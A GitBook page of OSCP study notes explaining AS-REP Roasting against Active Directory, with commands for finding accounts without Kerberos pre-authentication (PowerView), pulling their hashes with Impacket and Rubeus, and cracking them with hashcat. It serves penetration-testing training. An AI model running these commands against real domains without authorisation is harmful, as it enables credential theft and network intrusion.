🐲
OSCP Notes
  • 🐲OSCP Notes
  • 🐲OSCP Methodology
  • 💡Misc
    • Metasploit
    • Antivirus Evasion
    • Password attacks
    • Reverse Shells
    • Port Forwarding, Tunneling and Pivoting
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
      • Lingolo-ng
    • Information Gathering
      • Passive Reconnaissance
        • Whois
        • Google Dorks
        • NetCraft
        • Git Repository
      • Active Reconnaissance
        • DNS Enumeration
        • Host Discovery
        • Port scanning
        • SMTP - 25
        • SNMP
  • Linux
    • Local Enumeration
    • Local Privileges Escalation
      • Scheduled tasks
      • Password Authentication
      • Monitor Processes
      • SetUID Binaries and Capabilities
      • Sudoers
      • Kernel Exploits
  • Windows
    • 🧠Mindmap
    • 🥝Mimikatz Basics
    • Enumeration
      • External Enumeration
      • Local Enumeration
      • Active Directory
        • PowerView
    • NTLM Hashes
    • Local Privilege Escalation
      • Service Binary Hijacking
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Scheduled Tasks
      • Token impersonation
      • Backup Operators Group
    • Lateral Movement
      • WMI and WinRM
      • PsExec
      • Pass The Hash
      • Overpass The Hash
      • Pass The Ticket
      • DCOM
    • Persistence
      • Golden Ticket
      • Shadow Copy
    • Authentication Attacks
      • AS-REP Roasting
      • Kerberoasting
      • Password Spray
      • Silver Ticket
      • DC Sync
    • Client Side
    • NTLM Authentication
    • Kerberos Authentication
    • Cached Credentials
  • Web attacks
    • WordPress
    • SQL Injection (SQLi)
    • Command Injection
    • Directory Traversal
    • Local File Inclusion (LFI)
    • File Upload
Powered by GitBook
On this page
  • Introduction
  • Enumerate
  • Performing the attack
  • Impacket
  • Rubeus
  • Crack
  1. Windows
  2. Authentication Attacks

AS-REP Roasting

PreviousAuthentication AttacksNextKerberoasting

Last updated 7 months ago

Introduction

AS-REP Roasting targets Active Directory accounts without Kerberos Pre-authentication.

The attack is made in few steps:

  1. Attacker sends request in order to get TGT from the Authentication Server for target user without using pre-authentication.

  2. Authentication Server sends encrypted TGT to the attacker.

  3. Attacker brute-forces the TGT offline to obtain the user's password.

Enumerate

Enumerating accounts with Kerberos pre-authentication disabled from inside the network.

Get-DomainUser -PreauthNotRequired -Verbose

Performing the attack

Impacket

unauthenticated:

impacket-GetNPUsers <domain_name>/ -no-pass -dc-ip <dc_ip> -usersfile <userslist_file> -outputfile <hashes_file>

Authenticated

impacket-GetNPUsers -dc-ip <dc_ip> -request -outputfile <hashes_file> <domain>/<username>

Rubeus

.\Rubeus.exe asreproast /nowrap

Crack

hashcat -m 18200 <hashes> /usr/share/wordlists/rockyou.txt
AS-REQ